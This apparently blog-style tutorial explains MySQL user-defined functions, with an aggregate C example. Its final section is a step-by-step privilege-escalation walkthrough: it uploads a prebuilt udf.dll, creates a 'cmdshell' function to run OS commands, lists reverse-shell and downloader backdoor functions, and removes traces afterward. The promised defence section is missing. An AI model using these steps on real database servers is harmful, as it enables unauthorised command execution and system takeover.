
Adding New Functions to MySQL (User-Defined Function Interface UDF, Native Function)

Date: 2015-10-27 21:35:03


Contents

1. How to Add New Functions to MySQL
2. Features of the User-Defined Function Interface
3. User-Defined Function
4. UDF Argument Processing
5. UDF Return Values and Error Handling
6. UDF Compiling and Installing
7. Adding a New Native Function
8. UDF Privilege Escalation
9. Defending Against UDF Privilege Escalation

 

1. How to Add New Functions to MySQL

There are three ways to add new functions to MySQL:

1. UDF
You can add functions through the user-defined function (UDF) interface. User-defined functions are compiled as object files and then added to and removed from the server dynamically using the CREATE FUNCTION and DROP FUNCTION statements.

2. Native Function
You can add functions as native (built-in) MySQL functions. Native functions are compiled into the mysqld server and become available on a permanent basis.

3. Stored Function
Another way to add functions is by creating stored functions. These are written using SQL statements rather than by compiling object code.

0x1: Pros and Cons of UDFs (User-Defined Functions) and Native Functions

1. If you write user-defined functions, you must install object files in addition to the server itself. If you compile your function into the server, you don't need to do that.

2. Native functions require you to modify a source distribution. UDFs do not. You can add UDFs to a binary MySQL distribution. No access to MySQL source is necessary.

3. If you upgrade your MySQL distribution, you can continue to use your previously installed UDFs, unless you upgrade to a newer version for which the UDF interface changes. For native functions, you must repeat your modifications each time you upgrade.
Whichever method you use to add new functions, they can be invoked in SQL statements just like native functions such as ABS() or SOUNDEX().

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-functions.html

 

2. Features of the User-Defined Function Interface

The MySQL interface for user-defined functions provides the following features and capabilities:

1. Functions can return string, integer, or real values and can accept arguments of those same types.
2. You can define simple functions that operate on a single row at a time, or aggregate functions that operate on groups of rows.
3. Information is provided to functions that enables them to check the number, types, and names of the arguments passed to them.
4. You can tell MySQL to coerce arguments to a given type before passing them to a function.
5. You can indicate that a function returns NULL or that an error occurred.

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-features.html

 

3. User-Defined Function

For the UDF mechanism to work, functions must be written in C or C++ and your operating system must support dynamic loading. A UDF contains code that becomes part of the running server, so when you write a UDF, you are bound by any and all constraints that apply to writing server code. For example, you may have problems if you attempt to use functions from the libstdc++ library. Note that these constraints may change in future versions of the server, so it is possible that server upgrades will require revisions to UDFs that were originally written for older servers.

0x1: xxx()

The main function. This is where the function result is computed. The correspondence between the SQL function data type and the return type of your C/C++ function is as follows:

1. STRING: char *
2. INTEGER: long long
3. REAL: double
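
As a rough illustration of how the three return types shape the main function, the sketch below declares one function per SQL type. The UDF_INIT and UDF_ARGS definitions are simplified stand-ins so the fragment compiles on its own (a real UDF would include <mysql.h> instead), and the names demo_int, demo_real and demo_str are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Simplified stand-ins (assumption): a real UDF would include <mysql.h>
   rather than declare these structures itself. */
typedef struct { char *ptr; } UDF_INIT;
typedef struct {
  unsigned int arg_count;
  char **args;
  unsigned long *lengths;
} UDF_ARGS;

/* RETURNS INTEGER: the C function returns long long. */
long long demo_int(UDF_INIT *initid, UDF_ARGS *args,
                   char *is_null, char *error)
{
  (void)initid; (void)is_null; (void)error;
  return (long long)args->arg_count;   /* number of arguments passed */
}

/* RETURNS REAL: the C function returns double. */
double demo_real(UDF_INIT *initid, UDF_ARGS *args,
                 char *is_null, char *error)
{
  (void)initid; (void)is_null; (void)error;
  return args->arg_count / 2.0;
}

/* RETURNS STRING: the C function returns char * and also receives a
   result buffer and an output length. */
char *demo_str(UDF_INIT *initid, UDF_ARGS *args, char *result,
               unsigned long *length, char *is_null, char *error)
{
  (void)initid; (void)args; (void)is_null; (void)error;
  memcpy(result, "ok", 2);   /* the result need not be null-terminated */
  *length = 2;
  return result;
}
```

Only the string variant carries the extra result and length parameters; the integer and real variants return their value directly.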

0x2: xxx_init()

The initialization function for xxx(). If present, it can be used for the following purposes:

1. To check the number of arguments to XXX().
2. To verify that the arguments are of a required type or, alternatively, to tell MySQL to coerce arguments to the required types when the main function is called.
3. To allocate any memory required by the main function.
4. To specify the maximum length of the result.
5. To specify (for REAL functions) the maximum number of decimal places in the result.
6. To specify whether the result can be NULL.
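
The purposes listed above can be sketched in one initialization function. This is a minimal sketch, not the server's code: the structures are simplified stand-ins for those in mysql_com.h, and RATIO() is a hypothetical two-argument function invented for the example.

```c
#include <stdlib.h>
#include <string.h>

/* Simplified stand-ins (assumption): a real UDF gets these from <mysql.h>. */
enum Item_result { STRING_RESULT = 0, REAL_RESULT, INT_RESULT,
                   ROW_RESULT, DECIMAL_RESULT };

typedef struct {
  char maybe_null;           /* 1 if the function can return NULL */
  unsigned int decimals;     /* number of decimals, for REAL functions */
  unsigned long max_length;  /* maximum length of the result */
  char *ptr;                 /* free for the UDF's own use */
} UDF_INIT;

typedef struct {
  unsigned int arg_count;
  enum Item_result *arg_type;
} UDF_ARGS;

/* Initialization for a hypothetical RATIO(a, b) function. */
char ratio_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
  /* 1. Check the number of arguments. */
  if (args->arg_count != 2) {
    strcpy(message, "RATIO() requires two arguments");
    return 1;
  }
  /* 2. Ask the server to coerce both arguments to REAL. */
  args->arg_type[0] = REAL_RESULT;
  args->arg_type[1] = REAL_RESULT;

  /* 3. Allocate memory needed by the main function. */
  initid->ptr = malloc(sizeof(double));
  if (initid->ptr == NULL) {
    strcpy(message, "RATIO(): out of memory");
    return 1;
  }
  /* 4-6. Describe the result. */
  initid->max_length = 20;
  initid->decimals = 4;
  initid->maybe_null = 1;    /* for example when b is 0 */
  return 0;
}

/* Matching cleanup: frees what ratio_init() allocated. */
void ratio_deinit(UDF_INIT *initid)
{
  free(initid->ptr);
  initid->ptr = NULL;
}
```

Returning 1 with a message is what makes the server abort the statement before the main function is ever called.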

0x3: xxx_deinit()

The deinitialization function for xxx(). If present, it should deallocate any memory allocated by the initialization function.
When an SQL statement invokes XXX(), MySQL calls the initialization function xxx_init() to let it perform any required setup, such as argument checking or memory allocation. If xxx_init() returns an error, MySQL aborts the SQL statement with an error message and does not call the main or deinitialization functions. Otherwise, MySQL calls the main function xxx() once for each row. After all rows have been processed, MySQL calls the deinitialization function xxx_deinit() so that it can perform any required cleanup.
For aggregate functions that work like SUM(), you must also provide the following functions:

0x4: xxx_clear()

Reset the current aggregate value but do not insert the argument as the initial aggregate value for a new group.

0x5: xxx_add()

Add the argument to the current aggregate value.

/*
** Syntax for the new aggregate commands are:
** create aggregate function <function_name> returns {string|real|integer}
**          soname <name_of_shared_library>
**
** Syntax for avgcost: avgcost( t.quantity, t.price )
**    with t.quantity=integer, t.price=double
** (this example is provided by Andreas F. Bobak <[email protected]>)
*/


struct avgcost_data
{
  ulonglong    count;
  longlong    totalquantity;
  double    totalprice;
};


/*
** Average Cost Aggregate Function.
*/
my_bool
avgcost_init( UDF_INIT* initid, UDF_ARGS* args, char* message )
{
  struct avgcost_data*    data;

  if (args->arg_count != 2)
  {
    strcpy(
       message,
       "wrong number of arguments: AVGCOST() requires two arguments"
       );
    return 1;
  }

  if ((args->arg_type[0] != INT_RESULT) || (args->arg_type[1] != REAL_RESULT) )
  {
    strcpy(
       message,
       "wrong argument type: AVGCOST() requires an INT and a REAL"
       );
    return 1;
  }

  /*
  **    force arguments to double.
  */
  /*args->arg_type[0]    = REAL_RESULT;
    args->arg_type[1]    = REAL_RESULT;*/

  initid->maybe_null    = 1;        /* The result may be NULL (avgcost() sets *is_null) */
  initid->decimals    = 4;        /* We want 4 decimals in the result */
  initid->max_length    = 20;        /* Maximum length of the result */

  if (!(data = new (std::nothrow) avgcost_data))
  {
    strcpy(message, "Couldn't allocate memory");
    return 1;
  }
  data->totalquantity    = 0;
  data->totalprice    = 0.0;

  initid->ptr = (char*)data;

  return 0;
}

void
avgcost_deinit( UDF_INIT* initid )
{
  void *void_ptr= initid->ptr;
  avgcost_data *data= static_cast<avgcost_data*>(void_ptr);
  delete data;
}


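/* Forward declarations: avgcost_reset() calls these before they are defined */
void avgcost_clear(UDF_INIT* initid, char* is_null, char* message);
void avgcost_add(UDF_INIT* initid, UDF_ARGS* args, char* is_null, char* message);

/* This is only for MySQL 4.0 compatibility */
void
avgcost_reset(UDF_INIT* initid, UDF_ARGS* args, char* is_null, char* message)
{
  avgcost_clear(initid, is_null, message);
  avgcost_add(initid, args, is_null, message);
}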

/* This is needed to get things to work in MySQL 4.1.1 and above */

void
avgcost_clear(UDF_INIT* initid, char* is_null __attribute__((unused)),
              char* message __attribute__((unused)))
{
  struct avgcost_data* data = (struct avgcost_data*)initid->ptr;
  data->totalprice=    0.0;
  data->totalquantity=    0;
  data->count=        0;
}


void
avgcost_add(UDF_INIT* initid, UDF_ARGS* args,
            char* is_null __attribute__((unused)),
            char* message __attribute__((unused)))
{
  if (args->args[0] && args->args[1])
  {
    struct avgcost_data* data    = (struct avgcost_data*)initid->ptr;
    longlong quantity        = *((longlong*)args->args[0]);
    longlong newquantity    = data->totalquantity + quantity;
    double price        = *((double*)args->args[1]);

    data->count++;

    if (   ((data->totalquantity >= 0) && (quantity < 0))
       || ((data->totalquantity <  0) && (quantity > 0)) )
    {
      /*
      **    passing from + to - or from - to +
      */
      if (   ((quantity < 0) && (newquantity < 0))
         || ((quantity > 0) && (newquantity > 0)) )
      {
        data->totalprice    = price * (double)newquantity;
      }
      /*
      **    sub q if totalq > 0
      **    add q if totalq < 0
      */
      else
      {
        price          = data->totalprice / (double)data->totalquantity;
        data->totalprice  = price * (double)newquantity;
      }
      data->totalquantity = newquantity;
    }
    else
    {
      data->totalquantity    += quantity;
      data->totalprice        += price * (double)quantity;
    }

    if (data->totalquantity == 0)
      data->totalprice = 0.0;
  }
}


double
avgcost( UDF_INIT* initid, UDF_ARGS* args __attribute__((unused)),
         char* is_null, char* error __attribute__((unused)))
{
  struct avgcost_data* data = (struct avgcost_data*)initid->ptr;
  if (!data->count || !data->totalquantity)
  {
    *is_null = 1;
    return 0.0;
  }

  *is_null = 0;
  return data->totalprice/(double)data->totalquantity;
}

0x6: UDFs Handle Flow

MySQL handles aggregate UDFs as follows:

1. Call xxx_init() to let the aggregate function allocate any memory it needs for storing results.
2. Sort the table according to the GROUP BY expression.
3. Call xxx_clear() for the first row in each new group.
4. Call xxx_add() for each row that belongs in the same group.
5. Call xxx() to get the result for the aggregate when the group changes or after the last row has been processed.
6. Repeat steps 3 to 5 until all rows have been processed.
7. Call xxx_deinit() to let the UDF free any memory it has allocated.
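
The call order in steps 3 to 6 can be mimicked with a small driver. This is only a sketch of the sequence, not how the server is implemented: the sum_* functions stand in for xxx_clear(), xxx_add() and xxx(), and struct row, struct sum_state and run_aggregate() are hypothetical names.

```c
#include <stddef.h>

/* Stand-in for the state a real aggregate UDF would keep in initid->ptr. */
struct sum_state { long long total; };

static void sum_clear(struct sum_state *s) { s->total = 0; }
static void sum_add(struct sum_state *s, long long v) { s->total += v; }
static long long sum_result(const struct sum_state *s) { return s->total; }

/* One input row: a GROUP BY key and the value to aggregate. */
struct row { int group; long long value; };

/* Walks rows that are already sorted by group (step 2) and writes one
   result per group into out[]. Returns the number of groups. */
size_t run_aggregate(const struct row *rows, size_t n, long long *out)
{
  struct sum_state state;
  size_t groups = 0;

  for (size_t i = 0; i < n; i++) {
    if (i == 0 || rows[i].group != rows[i - 1].group)
      sum_clear(&state);                   /* step 3: first row of a group */
    sum_add(&state, rows[i].value);        /* step 4: every row in the group */
    if (i + 1 == n || rows[i + 1].group != rows[i].group)
      out[groups++] = sum_result(&state);  /* step 5: group ends */
  }
  return groups;
}
```

With rows (1,10), (1,5), (2,7), (3,1), (3,2) the driver produces three results: 15, 7 and 3.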

All functions must be thread-safe. This includes not just the main function, but the initialization and deinitialization functions as well, and also the additional functions required by aggregate functions. A consequence of this requirement is that you are not permitted to allocate any global or static variables that change! If you need memory, you should allocate it in xxx_init() and free it in xxx_deinit().
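
One way to follow this rule is to keep all mutable state behind initid->ptr, so each statement gets its own copy. The sketch below assumes simplified stand-in structures and a hypothetical counter() function that returns 1, 2, 3, ... for successive rows.

```c
#include <stdlib.h>
#include <string.h>

/* Simplified stand-ins (assumption): a real UDF gets these from <mysql.h>. */
typedef struct { char *ptr; } UDF_INIT;
typedef struct { unsigned int arg_count; } UDF_ARGS;

/* Allocate the per-statement counter instead of using a static variable. */
char counter_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
  (void)args;
  long long *count = malloc(sizeof *count);
  if (count == NULL) {
    strcpy(message, "counter(): out of memory");
    return 1;
  }
  *count = 0;
  initid->ptr = (char *)count;
  return 0;
}

/* Main function: increments the counter owned by this statement only. */
long long counter(UDF_INIT *initid, UDF_ARGS *args,
                  char *is_null, char *error)
{
  (void)args; (void)is_null; (void)error;
  long long *count = (long long *)initid->ptr;
  return ++*count;
}

/* Free the state allocated in counter_init(). */
void counter_deinit(UDF_INIT *initid)
{
  free(initid->ptr);
  initid->ptr = NULL;
}
```

Two statements running at the same time each hold a separate UDF_INIT, so their counters never interfere; a static counter would be shared by every thread.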

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-udf.html

 

4. UDF Argument Processing

UDF_ARGS is the structure in which MySQL packages the arguments passed to a function; its role is comparable to that of request_rec in Apache.
Mysql\include\mysql_com.h

typedef struct st_udf_args
{
  /* 
  Number of arguments 
  The number of arguments. Check this value in the initialization function if you require your function to be called with a particular number of arguments. For example:
  if (args->arg_count != 2)
  {
      strcpy(message,"XXX() requires two arguments");
      return 1;
  }
  */
  unsigned int arg_count;        

  /* 
  Pointer to item_results 
  A pointer to an array containing the types for each argument. The possible type values are 
  1. STRING_RESULT
  2. INT_RESULT
  3. REAL_RESULT
  4. DECIMAL_RESULT

  To make sure that arguments are of a given type and return an error if they are not, check the arg_type array in the initialization function. For example:
  if (args->arg_type[0] != STRING_RESULT || args->arg_type[1] != INT_RESULT)
  {
      strcpy(message,"XXX() requires a string and an integer");
      return 1;
  }
  */
  enum Item_result *arg_type;        

  /* 
  Pointer to argument 
  args->args communicates information to the initialization function about the general nature of the arguments passed to your function. 
  1. For a constant argument i, args->args[i] points to the argument value. A constant argument is an expression that uses only constants, such as 3 or 4*7-2 or SIN(3.14).
  2. For a nonconstant argument, args->args[i] is 0. A nonconstant argument is an expression that refers to values that may change from row to row, such as column names or functions that are called with nonconstant arguments.

  For each invocation of the main function, args->args contains the actual arguments that are passed for the row currently being processed.
  1. If argument i represents NULL, args->args[i] is a null pointer (0). 
  2. If the argument is not NULL, functions can refer to it as follows:
    1) An argument of type STRING_RESULT is given as a string pointer plus a length, to enable handling of binary data or data of arbitrary length. 
    The string contents are available as args->args[i] and the string length is args->lengths[i]. Do not assume that the string is null-terminated.

    2) For an argument of type INT_RESULT, you must cast args->args[i] to a long long value:
    long long int_val;
    int_val = *((long long*) args->args[i]);

    3) For an argument of type REAL_RESULT, you must cast args->args[i] to a double value:
    double    real_val;
    real_val = *((double*) args->args[i]);

    4) For an argument of type DECIMAL_RESULT, the value is passed as a string and should be handled like a STRING_RESULT value.
    5) ROW_RESULT arguments are not implemented.
  */
  char **args;            

  /* 
  Length of string arguments 
  For the initialization function, the lengths array indicates the maximum string length for each argument. You should not change these. 
  For each invocation of the main function, lengths contains the actual lengths of any string arguments that are passed for the row currently being processed. 
  For arguments of types INT_RESULT or REAL_RESULT, lengths still contains the maximum length of the argument (as for the initialization function).
  */
  unsigned long *lengths;        

  /* 
  Set to 1 for all maybe_null args 
  For the initialization function, the maybe_null array indicates for each argument whether the argument value might be null (0 if no, 1 if yes).
  */
  char *maybe_null;            

  /* 
  Pointer to attribute name 
  args->attributes communicates information about the names of the UDF arguments. 
  For argument i, the attribute name is available as a string in args->attributes[i] and the attribute length is args->attribute_lengths[i]. Do not assume that the string is null-terminated.
  By default, the name of a UDF argument is the text of the expression used to specify the argument. 
  For UDFs, an argument may also have an optional [AS] alias_name clause, in which case the argument name is alias_name. The attributes value for each argument thus depends on whether an alias was given.

  Suppose that a UDF my_udf() is invoked as follows: SELECT my_udf(expr1, expr2 AS alias1, expr3 alias2);
  In this case, the attributes and attribute_lengths arrays will have these values: 
  args->attributes[0] = "expr1"
  args->attribute_lengths[0] = 5

  args->attributes[1] = "alias1"
  args->attribute_lengths[1] = 6

  args->attributes[2] = "alias2"
  args->attribute_lengths[2] = 6
  */
  char **attributes;   

  /* 
  Length of attribute arguments 
  The attribute_lengths array indicates the length of each argument name.     
  */ 
  unsigned long *attribute_lengths;     
  void *extension;
} UDF_ARGS;
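
To make the per-type access rules concrete, here is a minimal sketch that walks the argument array the way a main function might. The structure is a cut-down stand-in for the one above, and sum_args() is a hypothetical helper: it adds numeric arguments by value and string arguments by their byte length.

```c
#include <stddef.h>

/* Simplified stand-ins (assumption): a real UDF gets these from <mysql.h>. */
enum Item_result { STRING_RESULT = 0, REAL_RESULT, INT_RESULT,
                   ROW_RESULT, DECIMAL_RESULT };

typedef struct {
  unsigned int arg_count;
  enum Item_result *arg_type;
  char **args;
  unsigned long *lengths;
} UDF_ARGS;

/* Adds up INT and REAL arguments plus the byte lengths of string
   arguments. SQL NULL arguments are skipped. */
double sum_args(const UDF_ARGS *args)
{
  double total = 0.0;

  for (unsigned int i = 0; i < args->arg_count; i++) {
    if (args->args[i] == NULL)
      continue;                               /* argument is SQL NULL */

    switch (args->arg_type[i]) {
    case INT_RESULT:
      total += (double)*((long long *)args->args[i]);
      break;
    case REAL_RESULT:
      total += *((double *)args->args[i]);
      break;
    case STRING_RESULT:
    case DECIMAL_RESULT:
      /* Use lengths[i], never strlen(): the data may not be
         null-terminated. */
      total += (double)args->lengths[i];
      break;
    default:
      break;                                  /* ROW_RESULT: not implemented */
    }
  }
  return total;
}
```

For the arguments (40, 1.5, 'abc', NULL) the helper returns 44.5.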

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-arguments.html

 

5. UDF Return Values and Error Handling

The initialization function should return 0 if no error occurred and 1 otherwise. If an error occurs, xxx_init() should store a null-terminated error message in the message parameter. The message is returned to the client. The message buffer is MYSQL_ERRMSG_SIZE characters long, but you should try to keep the message to less than 80 characters so that it fits the width of a standard terminal screen.
The return value of the main function xxx() is the function value, for long long and double functions. A string function should return a pointer to the result and set *length to the length (in bytes) of the return value. For example:

memcpy(result, "result string", 13);
*length = 13;

To indicate a return value of NULL in the main function, set *is_null to 1:

*is_null = 1;

To indicate an error return in the main function, set *error to 1:

*error = 1;
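
The three outcomes (a value, NULL, an error) can be combined in one string function. This is a sketch under stated assumptions: the structures are simplified stand-ins, upper1() is a hypothetical function that upper-cases its first argument, and RESULT_BUF_SIZE assumes the server-supplied result buffer holds 255 bytes.

```c
#include <ctype.h>
#include <stddef.h>

/* Simplified stand-ins (assumption): a real UDF gets these from <mysql.h>. */
typedef struct { char *ptr; } UDF_INIT;
typedef struct {
  unsigned int arg_count;
  char **args;
  unsigned long *lengths;
} UDF_ARGS;

/* Assumed size of the result buffer passed in by the server. */
#define RESULT_BUF_SIZE 255

/* Returns the first argument converted to upper case. */
char *upper1(UDF_INIT *initid, UDF_ARGS *args, char *result,
             unsigned long *length, char *is_null, char *error)
{
  (void)initid;

  if (args->args[0] == NULL) {          /* NULL in, NULL out */
    *is_null = 1;
    return NULL;
  }
  if (args->lengths[0] > RESULT_BUF_SIZE) {
    *error = 1;                         /* input does not fit the buffer */
    return NULL;
  }
  for (unsigned long i = 0; i < args->lengths[0]; i++)
    result[i] = (char)toupper((unsigned char)args->args[0][i]);

  *length = args->lengths[0];           /* length in bytes, no terminator */
  return result;
}
```

A function that needs a longer result would have to allocate its own buffer, typically in xxx_init(), and free it in xxx_deinit().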

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-return-values.html

 

6. UDF Compiling and Installing

Files implementing UDFs must be compiled and installed on the host where the server runs. This process is described below for the example UDF file sql/udf_example.c that is included in the MySQL source distribution.
The udf_example.c file contains the following functions:

1. metaphon() returns a metaphon string of the string argument. This is something like a soundex string, but it is more tuned for English.
2. myfunc_double() returns the sum of the ASCII values of the characters in its arguments, divided by the sum of the length of its arguments.
3. myfunc_int() returns the sum of the length of its arguments.
4. sequence([const int]) returns a sequence starting from the given number or 1 if no number has been given.
5. lookup() returns the IP address for a host name.
6. reverse_lookup() returns the host name for an IP address. The function may be called either with a single string argument of the form xxx.xxx.xxx.xxx or with four numbers.
7. avgcost() returns an average cost. This is an aggregate function.

A dynamically loadable file should be compiled as a shareable object file, using a command like this:

gcc -shared -o udf_example.so udf_example.c

If you are using gcc with configure and libtool (which is how MySQL is configured), you should be able to create udf_example.so with a simpler command:

make udf_example.la

Relevant Link: 

https://github.com/megastep/mysql-udf 
http://www.linuxidc.com/Linux/2011-06/37441.htm
http://www.toadworld.com/platforms/mysql/w/wiki/6573.udf-compiling-the-c-program
http://www.bccn.net/Article/sjk/mysql/jszl/200601/3371.html

 

7. Adding a New Native Function

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-native-function.html

 

8. UDF Privilege Escalation

0x1: Uploading the UDF DLL file via FTP or a webshell

1. Obtain an account on the target MySQL database
/*
root:111
*/

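2. Upload the udf.dll file: udf.dll is compiled beforehand
    1) [~, 5.0]: the DLL can be written to any directory; permissions do not need to be considered
    2) [5.0, 5.1]: the DLL must be exported to a system directory on the target machine (C:\WINDOWS or C:\WINDOWS\system32); otherwise the next step fails with the error "No paths allowed for shared library" (from 5.0 onward a UDF cannot be loaded by full path)
    3) [5.1, ~]: the DLL cannot be exported to a system directory; it must go to the plugin directory, which the statement show variables like '%plugin%'; reports. Specify this path when exporting the DLL, and in the next step the file name alone is enough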
//C:/wamp/bin/mysql/mysql5.5.20/lib/plugin/udf.dll

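3. Load udf.dll (for MySQL 5.0 and later, the DLL name in the statement must not include a full path)
/*
create function cmdshell returns string soname 'udf.dll'
The function being created must match an exported function declared in udf.dll
*/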
*/

4. Once the functions have been created correctly, they can be used from SQL statements
/*
select cmdshell("net user"); 

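Function descriptions
1. cmdshell: runs a cmd command
2. downloader: downloads a specified file from the network and saves it to a specified directory
3. open3389: enables Terminal Services on port 3389; the port can be specified (no restart is needed if the port is not changed)
4. backshell: reverse shell
5. ProcessView: enumerates system processes
6. KillProcess: terminates a specified process
7. regread: reads the registry
8. regwrite: writes to the registry
9. shut: shuts down, logs off, or restarts
10. about: description and help function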
*/ 

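5. When finished, you may need to delete the DLL exported in step 2. Drop the functions created in step 3 before deleting the DLL, otherwise the deletion will fail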
//select * from mysql.func;
//drop function cmdshell
